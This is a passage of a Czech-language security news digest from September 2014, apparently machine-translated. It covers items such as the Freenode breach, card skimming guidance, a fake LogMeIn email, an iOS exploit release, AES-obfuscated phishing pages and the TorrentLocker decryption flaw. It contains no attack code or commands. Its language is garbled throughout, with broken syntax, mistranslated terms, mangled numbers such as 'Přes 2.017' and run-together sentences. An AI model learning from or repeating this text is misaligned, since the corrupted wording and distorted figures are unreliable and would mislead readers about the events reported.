Pokud by byl uživatel stáhnout aplikaci, bude vidět, že aplikace požádá, aby mohla zobrazit a spravovat svou poštu, ale mnoho uživatelů si neuvědomuje, co to vlastně znamená a prostě poskytnout aplikaci, která povolení. Pokud útočníci ovládal tuto aplikaci, ale stihnul udělat celou řadu škodlivých věcí, včetně odstranění nebo krádeže dat, manipulaci osobní údaje, se snaží dále šířit skript posílám odkaz všem lidem v seznamu kontaktů uživatele, a další. Cantino oznámil Google svých zjištěních , ale teď, se společnost rozhodla, že s tím nic dělat. "To je v současné době pracuje, jak byla navržena, a není technickým zranitelnost," všimli si, ale dovolil mu, aby o vydání veřejnosti. Cantino chtěli vidět, přinejmenším velké oznámení řekl: "Tato aplikace byla vytvořena třetí osobou a není spjata s firmou Google ", kdy jsou uživatelé vyzváni k autorizaci takové aplikace. "Jak to je, myslím, že je nesmyslné očekávat, že by uživatelé pochopili možnost, že škodlivý kód by mohl být vykonán, zatímco zbývající zcela v rámci domény Google," říká. "Je ironií, že po schválení, Google pošle e-mail s vysvětlením, že třetí app strana byla oprávněna, ale v tuto chvíli je to tak, jak je pozdě! App již přístupné údaje uživatele, a smazal, odcizení, nebo manipulovat jej. "


Freenode trpí porušení žádá uživatele, změnit svá hesla
24.9.2014 Incidenty
Populární IRC síti Freenode utrpěl narušení bezpečnosti a žádá uživatele, změnit svá hesla, protože by mohl být ohrožen. "Dneska freenode infra tým všiml anomálii na jednom IRC server. Od té doby jsme zjistili, že to svědčí o Server je ohrožen neznámou třetí osobou, "zaměstnanci zveřejnil vysvětlení toho, co se stalo v sobotu. "Okamžitě jsme zahájili šetření zmapovat rozsah tohoto problému a nachází se podobné problémy s několika dalšími stroji a vzali ty offline. Pro Nyní, protože provoz v síti může být přičichl, doporučujeme, aby všichni změní své NickServ heslo jako preventivní opatření. "

"Vzhledem k tomu, může být přičichl provoz, můžete také chtít, aby zvážila všechny klíče kanálů nebo podobné tajné informace vyměňované po síti," dodali, a slíbil, že informuje uživatele o aktuální situaci v dané situaci. FreeNode se zaměřuje na podporu svobodných a open source softwarových projektů a je největší IRC síť na světě, čítající 80.000 a 90.000 uživatelů. Pokud jste uživatel FreeNode a použít správce hesel, zvažte výběr dlouhý a složitý heslo pro všechny vaše on-line účty. V FreeNode případu, heslo může obsahovat tolik jako 79 znaků.


Doporučené postupy pro prevenci skimming
24.9.2014 Viry
Bezpečnostní standardy Rada PCI vydala aktualizaci pro své pokyny pro obchodníky na ochranu proti karet skimming útoky v prostředích POS.

Karta skimming nadále vysoce ziskový podnik pro zločince, se Tajná služba Spojených států odhaduje, že náklady na spotřebitele a podniky alespoň 8000000000 dolarů ročně. Přestože obyčejně spojené s externími elektronickými zařízeními umístěnými na bankomatech, skimming může ohrozit mnoho různých platebních forem, včetně, POS terminály, bezdrátové síťové technologie, jako je Bluetooth a Wi-Fi připojení na internet a dokonce i EMV čipových karet. Díky pokroku v oblasti platebního technologií a nových technik skimming, obchodníci především i nadále v ohrožení. V reakci na tuto potřebu, Rada tvořil průmysl pracovní skupinu, aby aktualizovala své pokyny pro skimming oslovit širokou škálu společných cílech a nových vektorů útoku, včetně : sběr dat z malware a paměti škrabky nebo ohrožení softwaru; překryvné útoky, které využívají pokrok v 3D tiskárny; . mobilní nedostatky a útoky zařízení proti EMV čipových karet Bezpečnostní nejlepší praxe: Identifikujte rizika spojená s skimming - a to jak fyzické a logické bázi. Vyhodnotit a porozumět zranitelnosti vyplývajících z použití POS terminálů a terminálů infrastruktury, a které jsou spojeny s pracovníky, kteří mají přístup k platební prostředky spotřebitelů. předejít nebo zabránit trestné útoky proti POS terminálů a terminálů infrastruktury. Uveďte narušit svorky co nejdříve a oznámí příslušné agentury reagovat a minimalizovat dopad úspěšného útoku. Organizace mohou také odkazovat příloh v dokumentu k posouzení rizika zranitelnosti, a v jejich úsilí o splnění požadavku PCI DSS 9,9 pro zajištění řádného kontrolu zařízení POS a omezení útoku vektor zavedením jednoduché každodenní rutiny a školení zaměstnanců. "Odstřeďování je vysoce zisková a apeluje na širokou škálu zločinců, protože umožňuje je zachytit obrovské množství dat v krátkém čase, s nízkým rizikem odhalení, "řekl Troy Leach, CTO, PCI SSC. "Maloobchodníci a další organizace mohou využít těchto pokynů se vzdělávat o tom, jak rozpoznat a bránit proti tomuto typu útoku."


75% mobilních aplikací se nezdaří, základní bezpečnostní testy
24.9.2014 Mobil
Až do roku 2015, bude více než 75 procent mobilních aplikací selhání základních bezpečnostních testů, podle Gartner. Zaměstnanci podniku stáhnout z app obchodech a používat mobilní aplikace, které mohou přistupovat podnikových aktiv nebo k provedení obchodní funkce, a tyto aplikace mají malé nebo žádné bezpečnostní záruky. Tyto aplikace jsou vystaveni útokům a porušování podnikových bezpečnostních politik. "Podniky, které zahrnují mobilní výpočetní techniky a strategie BYOD jsou náchylné k narušení bezpečnosti, pokud se stanoví metody a technologie pro testování mobilních aplikací zabezpečení a zajištění rizik," řekl Dionisio Zumerle, hlavní výzkumný analytik ve společnosti Gartner. "Většina podniků jsou nezkušení v oblasti mobilní bezpečnosti aplikací. Dokonce i když se provádí testování bezpečnosti aplikací, je často provedeno nedbale vývojáři, kteří se většinou zabývají funkčností aplikací, nikoli jejich bezpečnosti. " Pan Zumerle řekl, že stávající statické testování zabezpečení aplikací (SAST) a dynamické testování zabezpečení aplikace (DASt) byly použity prodejci se změní a úprava těchto technologií pro řešení mobilní případy použití a musí vyhovovat mobilní testování zabezpečení aplikace challenges.Although SAST a DAST za posledních šest na osm let a staly se přiměřeně zralé, mobilní testování je nový prostor, a to i pro tyto technologie. Kromě SAST a DAST, nový typ zkoušky, analýzy chování, vzniká pro mobilní aplikace. Testování technologie monitoruje spuštěné aplikace pro detekci škodlivého a / nebo rizikové chování vykazované aplikace na pozadí (například, když aplikace audio přehrávač přehrává hudbu - ve stejnou dobu, ale také přistupuje k seznamu uživatele kontaktu nebo lokace, a zahájí Přenos dat do nějaké externí adresy IP). Testování klienta vrstvu - kód a GUI - mobilní aplikace, která běží na mobilním zařízení není dost. Vrstva server by měl být testován stejně. Mobilní klienti komunikovat se servery pro přístup aplikací a databází podniku je. Neschopnost chránit server představuje riziko ztráty dat stovky tisíc uživatelů z databází podniku. Kód a uživatelské rozhraní těchto server-side aplikace, by proto měla být testována s SAST a DASt technologií. "Dnes, více než 90 procent podniků využívat třetích stran komerční využití pro své mobilní strategie BYOD, a to je místo, kde proud hlavní testování zabezpečení aplikace by měly být použity úsilí, "řekl pan Zumerle. "App obchody jsou plné s aplikacemi, které většinou prokazují jejich inzerovaný užitečnost. Nicméně, podniky a jednotlivci by neměli používat, aniž by věnovat pozornost jejich bezpečnosti. . Oni by si měli stáhnout a používat pouze ty aplikace, které úspěšně prošly bezpečnostní testy prováděné specializovanými aplikace pro testování bezpečnosti dodavatelů " Gartner předpovídá, že do roku 2017, zaměření koncových porušení posune na tablety a smartphony - již existují tři útoky na mobilní zařízení pro Každý útok na pracovní ploše. Bezpečnostní funkce, které mobilní zařízení nabízejí dnes nebude stačit, aby porušení na minimum. Gartner doporučuje, aby podniky se zaměřují na ochranu dat na mobilních zařízeních prostřednictvím použitelné a efektivní řešení, jako je například aplikace omezení (přes balení, výstroje vývoje software nebo tvrdnutí). Přes 2.017, Gartner předpovídá, že 75 procent z porušení Mobile Security bude výsledkem mobil aplikace chybám, spíše než výsledkem hluboce technických útoků na mobilní zařízení. Klasickým příkladem konfigurací je zneužití osobních cloud služby prostřednictvím aplikací, kteří mají bydliště na chytré telefony a tablety. Když se používá k vyjádření podnikových dat, tato aplikace vedou k úniku dat, že organizace zůstává nevědomý pro drtivou většinu.


Zářijová 3x CON: Part 1
Britská cesta Kongresy

24.9.2014

Co, kdy a kde: 4. ročník 44CON , roční IT Security konference organizovaná Sense / Net, sro, se konal 10.-12 září v Londýně, v místě nedaleko výstaviště Earl Court. Geeks, kteří se stalo, aby si trochu strašidelné historické památky, může trvat pět minut chůze od místa konání navštívit starého a impozantní hřbitov, jeden z londýnských Sedm statečných .

Plán tento rok byl plný tří stop (většinou) 1h dlouhých prezentacích v rámci širokého spektra témat: od sociálního inženýrství k využívání technik, od crypto-měn na internetu věcí souvisejících s hrozbami pro GSM hacking. Některé úžasné semináře byly spuštěny současně v prostorách, které byly nesoucí známé názvy AES, 2DES a Blowfish.

odznak
44CON Badge: BusBlaster v3
Letošní odznak je nejen velmi pohledný, ale také se může ukázat, že je velmi užitečné, alespoň pro výzkumné pracovníky hardware orientované, jak se to stane, že je BusBlaster v3 deska, zvláště přizpůsobeny pro 44CON (najdete úplnou specifikaci zde ) . Tato malá roztomilá věcička může být použit k programování a ladění ARM zařízení.

Rozhovory
S tak mnoho věcí děje současně, nebylo možné plně účastnit i třetina z nich. Navíc, on-line program neobsahoval popis jednání, takže v některých případech výběru správné skladby předem tak trochu loterie. Nicméně celková kvalita prezentace byla tak vysoká, že bez ohledu na to, který mluví jste zvolili, vždy skončil s nějakou novou, cenné informace.

44con
Joshua J. Drake na jevišti
Z výběru velmi dobré jednání jsem se zúčastnil, tady jsou moje oblíbené ty:

"Zkoumání Android zařízení zabezpečení pomocí droid armáda" , Joshua J. Drake (jduck), ve kterém - v poměrně zábavnou formou - Joshua vysvětlil, jak a proč se stavěl jeho výzkumnou laboratoř, schopná testování 40+ zařízení se systémem Android ve stejnou dobu. Byl jsem opravdu ohromen rámci Joshua vynalezl pro správu jeho "armády droidů".
"Já lovit TR-069 Admins: pwning ISP jako šéf" tím, že Shahar Tal (jifa). Tato diskuse byla obzvláště zajímavé pro mě, protože já jsem v současné době podílí na výzkumu hrozby pro malé síťových zařízení, jako jsou obytné brány (aka SOHO routery), z nichž spravedlivý podíl pomocí protokolu TR-069 mluvit s ISP Auto konfigurace serverů. Ukazuje se, že (opravdu překvapivé, pokud se mě ptáte), že tento protokol je špatně zabezpečené a velmi zranitelné, a mohou být využívány takovým způsobem, který by mohl mít vliv na celou řadu zařízení. A nejhorší na tom je, že průměrný uživatel nemůže udělat mnoho pro zlepšení bezpečnosti jejich sítě, a to i v případě, že mají dostatečné znalosti. Většina zodpovědnosti leží na poskytovateli služeb, spolu s výrobci hardwaru, kteří se nezdají obavy dost o bezpečnostních otázkách ...
"Na Jejího Veličenstva tajné službě: GRX a Spy agentura" , Stephen Kho a Rob Kuiters. To docela zajímavá diskuse o tom, jak a proč GCHQ pirát Belgický poskytovatel GRX byla dána odborníky z týmu KPN CISO a uzavřel druhý den konference. První část přednášky byla technický popis protokolu GRX, to je funkčnost a slabé stránky, a jaký druh informací může být propuštěn; V druhé části jsou reproduktory předložila výsledky "rozsáhlé síťové skenování", které provedla během posledních několika měsíců. Je to opravdu děsivé, že existuje spousta zařízení se systémem zranitelné a * hrozně * zastaralý software na GRX sítí.
44con_networking
Socializace v 44CON
Networking je jednodušší s Gin hodin, přestávky jednu hodinu v odpoledním rozvrhu (na obou konferenčních dnů), který byl speciálně určen pro lidské interakce a socializace v intimní atmosféře konference baru. Tradiční červený double-decker autobus tam byl, aby britské pivo, jablečný mošt a Pimm je; Každý účastník byl také nabídnut zdarma sklenku ginu a tonikum.

Některé z materiálů již byly publikovány a jsou k dispozici na Slideshare .

Celkově Zkušenosti byl opravdu skvělý a my se těšíme na účast na další 44CON v roce 2015!


Fake LogMeIn Certifikát aktualizace s Bad AV objasněnosti
22.9.2014 Spam
Právě jsem obdržel docela "přijatelnou hledá" e-mail prohlašovat, že pocházejí z Logmein.com. E-mail prošel první "kontrolu střev".

"Z" adresa je auto-mailer@logmein.com.
To byla odeslána na adresu Použil jsem pro LogMeIn v minulosti
Pouze odkaz uvnitř emailu šel do legit LogMeIn URL.
Samozřejmě, že příloha zip se vydali nějaké poplašné zvony, zejména proto, že rozepnul na SCR (spořič obrazovky).

Podle VirusTotal, detekce AV je téměř neexistující v tomto bodě:

LogMeIn dělá zveřejní SPF záznam, a e-mail nepochází z platného LogMeIn pošty odesílatele, takže by to mělo být snadné descriminate proti těchto e-mailů pomocí standardní filtr nevyžádané pošty.


iOS 7.1.x využívat zpřístupněné (CVE-2014-4377)
22.9.2014 Zranitelnosti
Copak upgradovat na iOS 8 ještě? Kromě mnoha nových funkcí, Apple také opravil několik bezpečnostních chyb v iOS 8. Například CVE-2014-4377, emise paměti corrupion v základní grafickou knihovnu Ios. Využívat je nyní k dispozici pro tuto chybu zabezpečení.

Poznámka: jsem ověřil ještě, že exploit funguje / genuine. Nebudeme spojovat v tomto bodě k využití kódu, ale základní Google Fu by vám mělo umožnit, aby ji našel.

Autor tvrdí, že využití je "compleatly spolehlivá a přenositelná na iOS 7.1.x". Využití přichází v podobě chybně PDF, který by obvykle měly být poskytnuty jako obrázek uvnitř HTML stránky.


Microsoft odmítá předat e-maily uložené v Irsku, které se konalo v opovržení soudce
22.9.2014 Zákony
Microsoft vyzval americký okresní soudce Loretta Preska, soudce předsedá případě, že vidí společnost, která odmítá předat některé e-maily uložené v jeho Dublinu zařízení na vládě USA, je najít v opovržení. žádosti, z obou společností a vláda byla udělena a umožňuje společnosti Microsoft, aby okamžitě odvolat soudce Praska v loňské rozhodnutí. Soudce neukládá žádné sankce, zatímco v případě pokračuje soud odvolání. softwarový gigant již napadených počáteční rozhodnutí, tvrdí, že "vláda nemůže hledat a soud nemůže vydat povolení umožňující federální agenti rozebrat dveře . společnosti Microsoft v Dublinu zařízení Stejně tak vláda nemůže brance Microsoft se dělat to, co nemá žádnou pravomoc sám dělat -. tedy provést zaručenou hledání v zahraničí " Odvolání bylo neúspěšné, a rozsudek byl potvrzen 31. července 2014. "US vstoupil do mnoha dvoustranných dohod se stanoví zvláštní postupy pro získávání fyzické důkazy v jiném členském státě, včetně nedávno aktualizované dohody s Irskem. Myslíme si, že stejný postup by měl platit v on-line světě, "společnost vysvětlil v příspěvku na svých webových stránkách, které se věnují Případ, ve kterém potvrdila svůj záměr rozhodnutí ještě jednou odvolat. "Zvítězí-li americká vláda dosáhnout do datových center jiných zemí, ostatní vlády budou jistě následovat. Jeden už je. Začátkem tohoto měsíce britská vláda schválila zákon prohlašovat jeho právo požadovat od tech podniků na tvorbu e-maily uložené kdekoli na světě. To bude zahrnovat e-maily uložené v USA Američany, kteří nebyli nikdy ve Velké Británii. " "USA má i odpovědnost a příležitost ukázat nové vedení na otázky ochrany soukromí," říká Microsoft, který se obává, že současná rozhodnutí bude mít negativní dopad na jeho podnikání a konkurenceschopnosti poskytovatelů v USA cloud, jak to bude narušit důvěru zahraničních vlád a společností.


Útočníci resort AES crypto poplést phishingových stránek
22.9.2014 Phishing
Útočníci začali zaměstnávat šifrování AES zamaskovat skutečnou podstatu phishingových stránek z automatických nástrojů pro detekci phishingu. Jedná se o nejnovější zamlžování trik v sáčku podvodníky. Mají dříve používali - a ještě dělat - JavaScript šifrovacích nástrojů, datové identifikátory URI a charakter úniku k dosažení stejného cíle. Symantec vědec Nick Johnston analyzovány nalezený stránku phishing (on-line bankovnictví přihlašovací stránka), a vysvětlil postup: "Stránka obsahuje implementace JavaScript AES, který volá s heslem implementovaného (slouží ke generování klíče) a vložených šifrovaných dat (šifrového textu). dešifrovat obsah phishing je pak dynamicky napsaný na stránku s pomocí document.write (). Tento proces se děje téměř okamžitě , takže uživatelé pravděpodobně všimnete něčeho neobvyklého. " používá šifrování je důležitý pro udržení webové stránky pod radarem bezpečnostních výzkumníků "tak dlouho, jak je to možné, a aby se to více obtížné analyzovat. "příležitostná, povrchní rozbor stránky nebude odhalit jakákoli phishing související obsah, jak je obsažena v nečitelné šifrované textu, "poznamenal Johnston. byl učiněn žádný pokus o skrytí tlačítka nebo jinak utajit, co se děje - to je první "verze" tohoto mlžení techniky, a pravděpodobně nebude finální. Phishing detekce zlepší, a podvodníci budou muset držet krok, aby zůstala úspěšná.


Jak velký ISP bojuje DDoS útoky s vlastní řešení
22.9.2014 Zabezpečení
DDoS útoky jsou stále větší problém. V červenci, Arbor Networks vydala globální údaje DDoS útoku odvozené od jeho sledování infrastruktury ATLAS hrozeb, která ukazuje nárůst objemové útoků v první polovině roku 2014 s více než 100 útoků větších než 100 GB. / sec hlášeny. Bohužel, není to jen sílu bychom měli obávat. Ve skutečnosti, BT zjistila, že DDoS útoky jsou stále účinnější , což způsobuje významné narušení a někdy svrhnout organizace pro celé pracovní dny. často slyšíme o útocích proti webové stránky, z nichž většina je zmírnit jeden z mnoha DDoS služby zmírnění dispozici trhu. Co Vždycky mě zajímalo, bylo to, jak velcí kluci řešení těchto útoků. Jaké zbraně může ISP přinést na bitevní pole? technologie šité na míru Sakura internet, jeden z největších japonských poskytovatelů internetových služeb, vyvinula technologii, která příjme masivní IP toku letového provozu datové toky a provádí analytické v paměti identifikovat a zastavit DDoS útoky na jeho sítě, jak se stalo, a zároveň umožňuje legitimní provoz bude pokračovat. Postavili řešení zmírnění DDoS útok na vysokorychlostní NewSQL databáze VoltDB mít schopnost analyzovat 48.000 IP paketů za sekundu, což jim umožňuje vidět v reálném čase, které stránky jsou pod útokem, a provádět zdroj-a-destination-založené filtrování, což umožňuje čisté příchozí pakety se pohybovat, zatímco blokuje špatné. V dubnu 2014 první měsíc výroby tohoto řešení s VoltDB, Sakura detekován a zmírňuje 60 DDoS útoky, zatímco úspěšně obnovit legitimní provoz na většině vybraných lokalit - jak probíhaly útoky. Sakura se podařilo obnovit služby v 49 z 60 pokusů, které učinil, a v některých případech, za pouhých dvacet sekund. muž s plánem architekt za toto řešení je Tamihiro Yuzawa, inženýr sítě v důvěře datacenter sítí, mezi DC a inter-AS směrování provozu na Sakura internetu.

Yuzawa tým má na starosti hlavní sítě Sakura a jeho hlavním zájmem jsou ve velkém měřítku, šířku pásma-svinský příchozí DDoS útoky nevyžádané pakety, které by narušilo nejen legitimní komunikaci az hostitelského oběti, ale také způsobit vedlejší škody na sdílení ostatním zákazníkům jejich uplink s cílem útoku. Jak škodlivý je DDoS být ISP? "Pokud se nám nepodaří rychle snížit útok o velikosti 10 Gb, nebo mimo ni, důsledkem by mohlo být ošklivé trasy klapky v naší síti, což by mohlo vážně degradovat naše služby," říká Yuzawa. Ve většině případů to trvá méně než 10 sekund útok provoz na růst v průběhu gigabitů za sekundu. Před tím, než vyvinuli toto řešení, to bylo jen po jejich sledování síťový systém vyšle upozornění na problémy, dosažitelnosti, že by se podívat do nějaké další informace, aby zjistil, že byl útok DDoS již přichází. Yuzawa pamatuje, že tehdy, odběr vzorků provoz údaje již k dispozici, s několika kolektorů nahoru a běh. Ale tradiční RDBMS se snadno nasytí a dusit na obrovský příliv dat do vzorku, a byl tak schopen spouštět dotazy pro real-time analýzy. "Byli jsme si dobře vědomi, že to bude trvat skutečně rychlé zpracování backend dat, která by se dovážet a výpočetní obrovské množství dat, bez odkladu, aby bylo možné odhalit útok hned. To je důvod, proč vyskočil na mě, když uvolňování VoltDB hit zprávy, "řekl Yuzawa. Níže je screenshot, který prezentuje část dané aplikace UI (kliknutím vidět větší verzi). Chcete-li zachytit obrázek, Yuzawa použít archivovaných vzorků provozních údajů přehrát nedávné DDoS útok. Pouze cílová IP adresa (v červeném) byl maskován testovací server je. Zatímco útok pokračuje kolem 1,6 ~ 1.7Gbps, modrá čára označuje první krok (RTBH) nalétáno 15:38:15 a zelená čára označuje druhý krok (čištění), byl aktivován v 15:38:23. A jak z 15:45:27, 730 zdroj IP adresy jsou filtrovány.

Je tu hodně mluví o tom, jak Big Data mohou pomoci zmírnit DDoS útoky, ale jak to funguje přesně? Yuzawa vysvětluje, že každý směrovač nasazeny v jejich páteřní sítě je schopen paketů pro odběr vzorků, jak se objeví ve vniknutí rozhraní routeru a zapouzdření paketů ze vzorku do UDP zprávy ve standardizovaném formátu, který se pak vyváží do určeného kolektoru. Kolektor, jako databázového klienta, krmí databázi odebrány vzorky provozních údajů, jak to přijde z routerů. Existuje několik dalších klienta databáze procesy běžící po celou dobu, z nichž jedna požaduje různé typy souhrnných dotazů za jednotlivé cílové IP adresy, tak, že se může určit tok škodlivého příchozí provoz na místě. Další klient i nadále profilovat každém útoku, a to včetně původu IP adresy, a to i přímo na místě. Se neustále aktualizované informace o každém útoku, systém zmírnění chrání legitimní provoz na cílového hostitele, zatímco blackholing útoku pakety. Při vlastní rovná lepší mi Yuzawa řekl že v průběhu let Sakura hodnotil několik komerčních DDoS zmírnění spotřebiče, pár, které ukázaly, působivé schopnosti. Nicméně, aby bylo možné rychle provést skutečně efektivní protiopatření, v řádu sekund, oni potřebovali něco velmi specifického začlenit jejich návrh sítě, konfigurace a provozu, a v podstatě vytvořit své vlastní řešení, anti-DDoS. Nemáš postavil vlastní řešení, které řeší váš informační bezpečnosti problém? Napište mi e-mail.


Cyber ​​Security EXPO: Kdo, co a kdy
22.9.2014 Kongresy
V dnešním složitém a vždy-propojeném světě, útočníci mohou využívat stále větší počet vstupních bodů, aby páchaly škody na společnosti a jednotlivce. S více a více hráčů (Kyberzločinci, ví o korupčním jednání, vlády atd), které mohou představovat stále vážnějším hrozbám, jako jsou apts, špionáže a podvodů, je velmi důležité být připraven na budoucnost.

Vzhledem k tomu, hrozba kyberkriminality stále roste, je klíčem k připojení společnosti na nejnovější myšlení v kybernetické bezpečnosti. Mezi předních událostí počítačové bezpečnosti je Cyber ​​Security EXPO , která bude umístěna společně s IP EXPO Evropy v londýnském Excel. Konat v 8 -. 9. října 2014 mají za cíl, Cyber ​​Security EXPO bude poskytovat CISO a IT bezpečnostní pracovníci nástroje, nové myšlení a politiky ke splnění 21. století obchodní kybernetické bezpečnosti výzvu S více než 300 vystavovatelů, bude letošní akce mají řadu činností, aby nás blíže k hackerské komunity a jejích technik. Cyber ​​Hack, živé open source bezpečnostní laboratoř, odhalí návštěvníkům ukázky a diskuse o nejnovějších útocích a zjištěným rizikům. akce bude také hostit širokou škálu seminářů zasedání, včetně:

Bydlení v dohledu stavu - Mikko Hypponen, F-Secure
Už profesionálové kybernetické bezpečnosti ztratily kontakt? - Jitender Arora, Independent
Paradoxem velkých dat - Bruce Schneier, CO3 Systems
Vedení největší světový telefon podnikání bezpečná a její akcionáři šťastný - Richard Knowlton, Vodafone
Ochrana vaší organizaci ve vnějším světě-in - Jon Callas, Silent Circle
CIO a CSO v C-Suite: Kam patří? - Robert Quinn a Rick Howard, Palo Alto Networks
Teď mě vidíte, teď nemusíte: honit úhybný malware - Giovanni Vigna, Lastline.
Je důležité, aby podniky zavést komplexní přístup k ochraně jejich majetku, a to s největší pravděpodobností jedná spíše proaktivní než reaktivní přístup k bezpečnosti. ponořit se hlouběji do toho, co potřebujete vědět o svých vlastních systémů a obranu, zaregistrujte se na Cyber ​​Security EXPO 2014.


Většina lidí stále lhostejný k ohrožení soukromí
22.9.2014 Sledování
Zatímco kybernetické zloději nadále porušovat velké korporace, jako je JP Morgan, a právě minulý týden, Armáda spásy a Home Depot, Američané se zdají být lhostejný k rostoucí kybernetické krize, v souladu s idRADAR. 73 procent uvedlo, že neudělal nic chránit své soukromí nebo zabránit jejich kreditní a debetní karty před podvodným používá. . Tento údaj je o něco lepší, než výsledky průzkumu zveřejněných v červnu, což bylo 80 procent idRADAR CEO Tom Feige řekl: "Se všemi zprávami o nových porušení, a nových odhalení organizované gangy" počítačovými "v Číně a Rusku krade citlivé osobní a vládní záznamy, lidé potřebují probudit a rozpoznat krizi a chránit. " průzkum veřejného mínění ukázal, že drtivá většina lidí, kteří nemají ani mít čas změnit svá hesla. Pouze 11 procent přijmout nové heslo měsíčně, nyní jen velmi mírně z devíti procent, že řekli, že v červnu. Pouze 58 procent uvedlo, že by se to pouze tehdy, když nucený prostřednictvím webové stránky, nebo prodejce - což je o dvě procenta méně, než řekl, že by se v červnu. Dále 64 procent spotřebitelů uvedlo, že stále používají své platební karty, a to navzdory varování ze strany prodejců zvýšené riziko debetních přes kreditních karet. Toto číslo se zlepšila z 70 procent z červnového šetření. To vše v reakci na rostoucí počet úvěrových podvodů mezi spotřebiteli. Průzkum vykázaly růst o debetních a podvody s kreditními kartami téměř dvě procenta na pouhé tři měsíce. Průzkum také uvádí, že téměř 43 procent prospěch federální vlády, kterým se stanoví vnitrostátní datový porušení hlášení zákon. To je téměř o 2,5 procenta od června. "Tam je nějaký mírný rostoucí obavy o roli federální vlády v oblasti ochrany občanů proti kybernetické porušení," řekl Feige. "Věci nejsou zklidnění. Jsou čím dál horší a pravděpodobně ještě zhorší." "Ano, je tady další vzestup vědomí, že federální vláda musí udělat víc, ale je to stále mnohem nižší než u většiny lidí," dodává Feige . "Je zřejmé, že je zde velká potřeba vzdělávání v této otázce, a spotřebitelé musí tlačit Kongres přijmout ochranná nařízení." Průzkum byl proveden v srpnu 2014 idRADAR mezi národní náhodného vzorku 309 respondentů spotřebitele, které odrážejí široké spektrum věku , ekonomické a vzdělávací skupiny. Průzkum má plus nebo minus dvě procenta přesnost rychlosti.


Masivní únik Gmail pověření není v důsledku porušení
22.9.2014 Incidenty
Do teď, možná jste slyšeli, že došlo k úniku několika téměř 5 milionů uživatelské jméno a heslo kombinace spojené s účty Google. Podle RT zprávy , data byla k dispozici ke stažení na ruské bezpečnostní fórum Bitcoin uživatelem, který řekl, že 60 procent z kombinace jsou stále platné. Uživatelé Reddit byly komentovat únik na niti, která od té doby byla odstraněna, někteří říkají, že se jim podařilo nalézt jejich pověření mezi unikly jednou, jiné za zmínku, že hesla v pochybnost byly ty staré , jiní ještě prohlašovat, že oni nikdy použity zahrnuta hesla jejich účtů Google a positing že unikly pověření bylo pro jiné online účtů. Mezitím, Google již vyšetřuje únik a došel k závěru, že jejich systémy nebyly ohroženy. "Jeden z nešťastných skutečností na internetu je dnes jev známý v bezpečnostních kruzích jako "pověření dumps'-vysílání seznamů uživatelských jmen a hesel na webu. Neustále monitorování těchto skládek, abychom mohli rychle reagovat na ochranu našich uživatelů . Tento týden jsme identifikovali několik seznamů prohlašovat, že obsahují Google a pověření jiných poskytovatelů připojení k internetu "," tým Google Spam a zneužívání komentoval na svém blogu ve středu. "Zjistili jsme, že méně než 2% z uživatelského jména a hesla kombinací mohlo fungovat a naše automatické anti-Únos systémy by zablokoval mnohé z těchto pokusů o přihlášení. Jsme chráněná dotčené účty a vyžadovaly těmto uživatelům resetovat jejich hesla. " Oni vyzval, aby uživatelé používali silné, jedinečné heslo pro svůj účet Google a zvážit ověření 2-krokem ke zvýšení jeho bezpečnosti. Výzkumníci z CSI bezpečnosti Skupina se analyzují na trove a odhadují, že údaje, které jsou se datuje stejně jako tři roky. "Nemůžeme potvrdit, že je to opravdu až 60 procent, ale velké množství uniklých dat je legitimní," komentoval CSIS CTO Peter Kruse. Podle jejich analýzy, většina přihlašovací údaje patří USA a uživateli ve Velké Británii. Uživatelům se doporučuje změnit své heslo Google a změnit heslo spojené s účtem, kde použili svou adresu služby Gmail jako uživatelské jméno. Kdykoli je to možné, uživatelům se doporučuje nastavit dvoufaktorovou autentizaci.


Vědci odemknout šifrování TorrentLocker
22.9.2014 Analýzy
Tým finských vědců zjistil, že soubory zašifrované nedávno objevený TorrentLocker ransomware lze dešifrovat, aniž by zaplatil výkupné - v případě, že uživatel má alespoň jeden ze šifrovaných souborů zálohovaných někde, a tento soubor je více než 2MB velikosti. Předchozí výzkumu konstatovali, že TorrentLocker je zcela nový kmen ransomware, který napodobuje jak CryptoLocker a CryptoWall, takže je zřejmé, že podvodníci za ním se snaží vydělávat na tom, že tyto dva typy malware jsou dobře známé a obávané. Bezpečnostní experti z iSIGHT Partners také řekl, že navzdory podvodníci prohlašovat, že malware používá šifrování RSA-2048, je ve skutečnosti používá algoritmus Rijndael. výzkumníci Taneli Kaivola Patrik Nisén a Antti Nuopponen, kteří pracují pro informační bezpečnost poradenství NIXu, byly analyzovány a TorrentLocker variantu a mít více informací sdílet. Započítávání Trend Micro reseachers s objevem, že TorrentLocker "šifrované soubory tím, že kombinuje keystream do souboru s výhradním nebo provozu (XOR)" také objevil, že malware se obsahují kód, AES a SHA256 a SHA512 hashovací algoritmy. "Přesné údaje o tom, jak se šifrování provádí stále neznámý, ale silně se, že šifrování je prováděno s proudovou šifru, která je vyrobena s použitím AES a hašovací funkce. . Skutečnost, že keystream se skládá z 16 bytových bloků také podporuje předpoklad, že AES se používá k výrobě keystream, "poukázali malware autorů chybou je následující: malware používá stejný keystream šifrovat všechny soubory v rámci Stejné infekce. "Vzhledem k tomu, šifrování bylo provedeno tím, že kombinuje keystream se souborem holého textu pomocí operace XOR, jsme byli schopni obnovit keystream použito k zašifrování těchto souborů pouhým uplatněním XOR mezi zašifrovaný soubor a holého souboru" sdíleli . "Další analýza zašifrovaných souborů také ukázal, že malware program, přidáno 264 bajtů dalších dat na konci každého šifrovaného souboru, a že pouze šifruje první 2MB souboru a zbytek neporušené." Oni předpokládají, že výběr pouze šifrování první 2MB byl vyroben, aby urychlila proces šifrování, ale také možnost výzkumníci obnovit keystream. "přesný účel dodatečných 264 bajtů, které malware program přidá na konec každého souboru je stále neznámý, ale zdá se, že je jedinečný pro každou infekci. Protože je unikátní, to nám umožnilo napsat program, který automaticky rozpozná, který keystream bylo použito k šifrování souborů, "došli k závěru, a vyzval dotčené uživatelům dostat se do kontaktu . Zatímco tato zpráva je velmi vítán, bude toto zjevení nevyhnutelně dělají vývojáři TorrentLocker je zlepšení systému implementace šifrování, takže je to dobrý nápad - pokud jste tak již neučinili - začít dělat pravidelné zálohování vašich souborů.


Výzkumníci najdou nebezpečné rozšíření v Chrome Web Store
22.9.2014 Rizika
